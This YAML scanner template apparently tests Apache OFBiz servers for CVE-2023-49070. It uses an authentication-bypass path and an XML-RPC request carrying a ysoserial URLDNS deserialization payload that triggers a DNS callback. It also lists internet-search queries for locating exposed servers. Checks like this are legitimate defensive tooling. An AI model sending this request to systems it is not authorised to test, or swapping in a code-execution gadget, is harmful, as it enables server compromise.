CVE-2023-49070.yaml

id: CVE-2023-49070

info:
  name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    Apache OFBiz是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统，提供了一整套基于Java的Web应用程序组件和工具。
    Apache OFBiz 在 18.12.10 版本之前存在远程代码执行漏洞。由于 XML-RPC 已经不再维护，经过身份认证的攻击者可以利用 XML-RPC 进行远程代码执行利用，从而控制服务器。
    FOFA: app="Apache_OFBiz"
    Hunter: app.name="OFBiz"
    ZoomEye: app:"Apache OFBiz"
  reference:
    - https://mp.weixin.qq.com/s/se43Z1NlwLWEul5FcT5nug
    - https://mp.weixin.qq.com/s/OYLKC_vPiyx0JzFX6Ia5FA
    - https://mp.weixin.qq.com/s/_QaoaiVJUcYLN_QCfuGSLQ
    - https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
    - https://seclists.org/oss-sec/2023/q4/257
    - https://twitter.com/Siebene7/status/1731870759130427726
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49070
    - https://issues.apache.org/jira/browse/OFBIZ-12812
  tags: seclists,cve,cve2023,apache,ofbiz,deserialization,rce
  created: 2024/01/05

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
  base64payload: ysoserial("URLDNS",reverseHost,"base64")
rules:
  r0:
    request:
      method: POST
      path: /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
      headers:
        Content-Type: application/xml
      body: |
        <?xml version="1.0"?>
        <methodCall>
        <methodName>RCE</methodName>
        <params>
        <param>
        <value>
        <struct>
        <member>
        <name>RCE</name>
        <value>
        <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{base64payload}}</serializable>
        </value>
        </member>
        </struct>
        </value>
        </param>
        </params>
        </methodCall>
    expression: reverse.wait(5)
expression: r0()